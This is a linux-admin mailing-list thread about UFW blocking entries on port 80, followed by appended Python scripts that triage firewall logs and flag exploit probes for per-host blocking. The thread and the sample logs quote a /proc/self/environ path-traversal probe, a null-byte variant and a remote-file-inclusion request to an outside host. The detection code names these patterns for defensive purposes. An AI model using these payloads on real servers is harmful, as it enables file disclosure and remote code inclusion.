> -----Original Message-----
>
> Hello Dermot,
>
> as far as I can see, HTTP is blocked (DPT=80).
>
> Why are you using UFW? You've got a DMZ?
>
> Regards
> Marcel

Well I really hope that port 80 is open! I have not heard any complaints from users and I can still connect. The command I ran was `ufw allow "Apache Full"`. This should have enabled the profile for Apache that is stored in /etc/ufw/applications.d/apache2.2-common.

I am using UFW because I wanted to reject connections from those hosts that I could find in the httpd logs that were attempting to run the PHP exploits I mentioned. There is a firewall in front of the server. The rules for the firewall allow all traffic to port 80, but it's not directly under my control. I thought that UFW would give me finer control over what hosts could connect.

Are you saying that the log entries I mentioned are for connections to port 80? Out of 300 log entries, 288 refer to DPT=80. I thought this rule would allow traffic to port 80:

ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 multiport dports 80,443 /* 'dapp_Apache%20Full' */

Is it possible that these log entries refer to blocks to port 80 for some other reason, incomplete packets perhaps?

Thanks,
Dermot.
Here are a few more log entries:

Dec 20 15:16:50 spl-live-04 kernel: [4815860.546796] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=5744 PROTO=TCP SPT=35936 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:17:10 spl-live-04 kernel: [4815880.590616] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=12876 PROTO=TCP SPT=38735 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:17:30 spl-live-04 kernel: [4815900.544664] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=42844 PROTO=TCP SPT=35936 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:17:52 spl-live-04 kernel: [4815921.978254] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=46.103.144.234 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=49496 DF PROTO=TCP SPT=49793 DPT=80 WINDOW=65535 RES=0x00 ACK RST URGP=0
Dec 20 15:18:11 spl-live-04 kernel: [4815940.856559] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=167.21.254.12 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=50 ID=22633 PROTO=TCP SPT=56527 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:18:31 spl-live-04 kernel: [4815961.228775] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=194.209.88.151 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=49 ID=36073 PROTO=TCP SPT=59930 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:18:50 spl-live-04 kernel: [4815980.576344] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=145.36.235.4 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=53 ID=45980 PROTO=TCP SPT=27691 DPT=80 WINDOW=1032 RES=0x00 ACK FIN URGP=0
Dec 20 15:19:11 spl-live-04 kernel: [4816001.276032] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=82.137.200.53 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=47 ID=36569 PROTO=TCP SPT=62544 DPT=80 WINDOW=1032 RES=0x00 ACK FIN URGP=0
Dec 20 15:19:31 spl-live-04 kernel: [4816021.003750] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=34.254.119.222 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=58 ID=34212 PROTO=TCP SPT=53102 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0

> > -----Original Message-----
> > From: linux-admin-owner@xxxxxxxxxxxxxxx [mailto:linux-admin-owner@xxxxxxxxxxxxxxx] On Behalf Of Dermot Paikkos
> > Sent: Tuesday, December 20, 2011 3:03 PM
> > To: linux-admin@xxxxxxxxxxxxxxx
> > Subject: UFW logging
> >
> > Hi,
> >
> > I noticed on our company http server that I had a lot of 'probes'. My logwatch file (text-mode) is 3+MB and rising. I have thousands of entries in my logwatch reports:
> >
> > A total of 5711 sites probed the server
> > 1.152.198.116
> > 1.22.185.5
> > 1.23.105.130
> > 1.38.24.232
> > 1.38.25.24
> > 1.39.95.219
> > 1.53.101.185
> > 101.108.239.43
> > ...
> > ...
> > ...
> >
> > I'm not sure what the above probes are. Any help in understanding the above would be appreciated.
> >
> > I also have several entries like this:
> >
> > A total of 4 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
> >
> > /images/?option=com_sectionex&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP Response 200
> > /?
> >
> > I believe these are php exploits.
> >
> > To help secure the server, I installed UFW, enabled and allowed HTTP, HTTPS and SSH. I then monitored the logs to see what was happening. What I am not clear on is what service the log entries below refer to.
> >
> > Dec 20 13:10:35 myserver kernel: [4808284.769172] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=194.27.44.2 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=109 ID=10243 DF PROTO=TCP SPT=6565 DPT=80 WINDOW=4320 RES=0x00 ACK FIN URGP=0
> > Dec 20 13:11:01 myserver kernel: [4808311.356089] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=151.96.254.4 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=55 ID=44116 PROTO=TCP SPT=58842 DPT=80 WINDOW=1032 RES=0x00 ACK RST URGP=0
> >
> > I am getting an entry like this every 20-30 seconds. Can anyone tell me what service/port is being blocked in the above log entries?
> >
> > Below are the rules at the moment.
> > Thanks in advance,
> > Dermot
> >
> > Chain ufw-user-input (1 references)
> >  pkts   bytes target  prot opt in  out source           destination
> > 29164 1620981 ACCEPT  tcp  --  *   *   0.0.0.0/0        0.0.0.0/0    tcp dpt:80 /* 'dapp_Apache' */
> >  5151  299728 ACCEPT  tcp  --  *   *   0.0.0.0/0        0.0.0.0/0    multiport dports 80,443 /* 'dapp_Apache%20Full' */
> >     3     180 ACCEPT  tcp  --  *   *   0.0.0.0/0        0.0.0.0/0    tcp dpt:22 /* 'dapp_OpenSSH' */
> >     0       0 REJECT  all  --  *   *   220.162.244.251  0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   217.115.199.40   0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   93.84.116.216    0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   85.10.204.194    0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   221.232.155.6    0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   122.255.96.164   0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   77.240.21.131    0.0.0.0/0    reject-with icmp-port-unreachable
> >     0       0 REJECT  all  --  *   *   83.170.79.6      0.0.0.0/0    reject-with icmp-port-unreachable
> >
> > Chain ufw-user-forward (1 references)
> >  pkts   bytes target  prot opt in  out source           destination
> >
> > Chain ufw-user-output (1 references)
> >  pkts   bytes target  prot opt in  out source           destination
> >
> > Chain ufw-user-limit-accept (0 references)
> >  pkts   bytes target  prot opt in  out source           destination
> >     0       0 ACCEPT  all  --  *   *   0.0.0.0/0        0.0.0.0/0
> >
> > Chain ufw-user-limit (0 references)
> >  pkts   bytes target  prot opt in  out source           destination
> >     0       0 LOG     all  --  *   *   0.0.0.0/0        0.0.0.0/0    limit: avg 3/min burst 5 LOG flags 0 level 4 prefix `[UFW LIMIT BLOCK] '
> >     0       0 REJECT  all  --  *   *   0.0.0.0/0        0.0.0.0/0    reject-with icmp-port-unreachable
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-admin" in
> > the body of a message to majordomo@xxxxxxxxxxxxxxx
> > More majordomo info at http://vger.kernel.org/majordomo-info.html
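The reply above asks whether the DPT=80 blocks could have some cause other than port 80 being closed. The script below is an added example, not code from the thread: it parses "[UFW BLOCK]" kernel log lines in the format quoted above and sorts them by TCP flags. A FIN or RST that carries ACK but no SYN belongs to a connection the kernel's connection tracker no longer has an entry for (for example a late FIN/ACK arriving after the server side already closed and the conntrack entry expired). ufw's before.rules drop such INVALID packets and log them with the same "[UFW BLOCK]" prefix before the per-port ACCEPT rules in ufw-user-input are ever consulted, so an "ACK FIN DPT=80" entry is not evidence that the "Apache Full" rule is failing. A bare SYN, by contrast, is a genuine connection attempt that no allow rule matched, which is the class worth looking at. The sample lines are constructed in the thread's format with documentation-range addresses; the class names are this example's own.

```python
"""Triage [UFW BLOCK] kernel log lines by TCP flags (added example)."""
import re
from collections import Counter, defaultdict

# Constructed sample in the format of the thread's "[UFW BLOCK]" entries.
# Addresses are from documentation ranges; flag mixes are chosen to cover each case.
SAMPLE_LOG = """\
Dec 20 15:16:50 spl-live-04 kernel: [4815860.546796] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=203.0.113.3 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=5744 PROTO=TCP SPT=35936 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0
Dec 20 15:17:52 spl-live-04 kernel: [4815921.978254] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=203.0.113.9 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=49496 DF PROTO=TCP SPT=49793 DPT=80 WINDOW=65535 RES=0x00 ACK RST URGP=0
Dec 20 15:18:11 spl-live-04 kernel: [4815940.856559] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=203.0.113.21 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=50 ID=22633 DF PROTO=TCP SPT=56527 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0
Dec 20 15:18:31 spl-live-04 kernel: [4815961.228775] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=203.0.113.21 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=50 ID=36073 DF PROTO=TCP SPT=56528 DPT=3306 WINDOW=5840 RES=0x00 SYN URGP=0
Dec 20 15:18:50 spl-live-04 kernel: [4815980.576344] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=203.0.113.44 DST=198.51.100.7 LEN=78 TOS=0x00 PREC=0x00 TTL=53 ID=45980 DF PROTO=UDP SPT=27691 DPT=137 LEN=58
Dec 20 15:19:11 spl-live-04 kernel: [4816001.276032] some unrelated kernel message
"""

TCP_FLAG_NAMES = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")


def parse_block_line(line):
    """Parse one [UFW BLOCK] line into a dict of KEY=VALUE fields plus a 'flags' set.

    Returns None for lines that are not UFW block records.
    """
    if "[UFW BLOCK]" not in line:
        return None
    entry = dict(FIELD_RE.findall(line))
    # TCP flags are bare tokens after RES=..., not KEY=VALUE pairs.
    entry["flags"] = frozenset(tok for tok in line.split() if tok in TCP_FLAG_NAMES)
    return entry


def classify(entry):
    """Label the blocked packet (labels are this example's own naming).

    'stale-tcp' : FIN/RST with ACK and no SYN, i.e. a segment for a connection conntrack
                  no longer tracks; ufw drops these as INVALID in ufw-before-input, ahead
                  of the per-port allow rules, so DPT=80 here does not mean 80 is closed.
    'new-tcp'   : a bare SYN, a real connection attempt that no allow rule matched.
    'other-tcp' : any other TCP segment (e.g. a lone ACK).
    'non-tcp'   : UDP, ICMP and so on.
    """
    if entry.get("PROTO") != "TCP":
        return "non-tcp"
    flags = entry["flags"]
    if "SYN" in flags and "ACK" not in flags:
        return "new-tcp"
    if flags & {"FIN", "RST"} and "SYN" not in flags:
        return "stale-tcp"
    return "other-tcp"


def triage(log_text):
    """Summarise blocked packets: count per class, plus ports and sources seen per class."""
    by_class = Counter()
    ports = defaultdict(Counter)
    sources = defaultdict(set)
    for line in log_text.splitlines():
        entry = parse_block_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        by_class[kind] += 1
        ports[kind][entry.get("DPT", "?")] += 1
        sources[kind].add(entry.get("SRC", "?"))
    return {
        "by_class": dict(by_class),
        "ports": {k: dict(v) for k, v in ports.items()},
        "sources": {k: sorted(v) for k, v in sources.items()},
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for kind, n in sorted(summary["by_class"].items()):
        print(f"{kind:10s} {n:4d}  ports={summary['ports'][kind]}  from={summary['sources'][kind]}")
```

Run it against the real file (for example `triage(open("/var/log/kern.log").read())`) and look at the "new-tcp" bucket: that is where genuine blocked connection attempts, and therefore the candidates for per-host rules, show up. A large "stale-tcp" bucket on DPT=80 and DPT=443 is the normal background of a busy web server and can be ignored or silenced with a lower ufw logging level.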
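The reply also says the point of UFW here was to shut out the hosts seen running the /proc/self/environ probes in the httpd logs. The script below is an added example (not the thread's own code) that scans Apache combined-format access log lines for a few traversal, local-file-inclusion and remote-file-inclusion signatures after percent-decoding the request target, and emits one `ufw insert 1 deny from <ip> to any` per offending host. The `insert 1` is the important part: iptables walks ufw-user-input top to bottom, and in the rule listing quoted above the per-host REJECT rules sit after the ACCEPT for tcp dpt:80, so HTTP from those hosts is accepted before a REJECT is ever reached (consistent with those rules' packet counters reading 0). Inserting the block at position 1 puts it ahead of the "Apache Full" allow. The signature names, the sample log lines and the addresses in them are constructed for this example.

```python
"""Derive UFW per-host block rules from exploit-looking Apache requests (added example)."""
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines with documentation-range addresses. The first
# request mirrors the com_sectionex /proc/self/environ probe quoted in the thread.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [20/Dec/2011:13:10:35 +0000] "GET /images/?option=com_sectionex&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.8 - - [20/Dec/2011:13:11:01 +0000] "GET /index.php?page=http://203.0.113.99/id.txt?? HTTP/1.1" 200 2048 "-" "libwww-perl/5.836"
192.0.2.77 - - [20/Dec/2011:13:11:20 +0000] "GET /about/ HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Dec/2011:13:12:02 +0000] "GET /index.php?option=com_x&controller=..%2F..%2F..%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 404 512 "-" "Mozilla/5.0"
192.0.2.77 - - [20/Dec/2011:13:13:09 +0000] "GET /docs/../images/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are applied to the percent-decoded target so %2F and %00 cannot hide them.
# The names are this example's own.
SIGNATURES = {
    "proc-environ-lfi": re.compile(r"/proc/self/environ"),
    "deep-traversal": re.compile(r"(?:\.\./){3,}"),   # three or more ../ in a row
    "null-byte": re.compile(r"\x00"),                 # %00 truncation trick
    "remote-include": re.compile(r"[?&]\w+=https?://", re.I),
}


def parse_access_line(line):
    """Split a combined-format line into ip/method/target/status; None if it does not parse."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["decoded"] = unquote(req["target"])  # %2F -> '/', %00 -> NUL, ...
    return req


def match_signatures(decoded_target):
    """Names of all signatures that fire on one decoded request target, sorted."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded_target))


def suspicious_hosts(log_text):
    """Map source IP -> sorted list of signature names hit, for hosts that hit any."""
    hits = {}
    for line in log_text.splitlines():
        req = parse_access_line(line)
        if req is None:
            continue
        names = match_signatures(req["decoded"])
        if names:
            hits.setdefault(req["ip"], set()).update(names)
    return {ip: sorted(names) for ip, names in hits.items()}


def ufw_commands(hosts, action="deny"):
    """One rule per host, inserted at position 1 so it precedes the 'Apache Full' allow.

    action="reject" gives the icmp-port-unreachable behaviour of the thread's existing rules.
    """
    return [f"ufw insert 1 {action} from {ip} to any" for ip in sorted(hosts)]


if __name__ == "__main__":
    hosts = suspicious_hosts(SAMPLE_ACCESS_LOG)
    for ip, names in sorted(hosts.items()):
        print(f"{ip:15s} {', '.join(names)}")
    print("\n".join(ufw_commands(hosts)))
```

Review the printed list before running the commands (ufw accepts `--dry-run` in front of `insert` to show the resulting iptables rules without applying them), since a single `../` in an otherwise ordinary path, like the logo request in the sample, is deliberately not enough to trigger a block. The 5711-host figure from logwatch is a reminder that per-host rules do not scale past a handful of persistent offenders; for the long tail, a rate-limiting tool that reads the same access log and expires its bans is the usual next step.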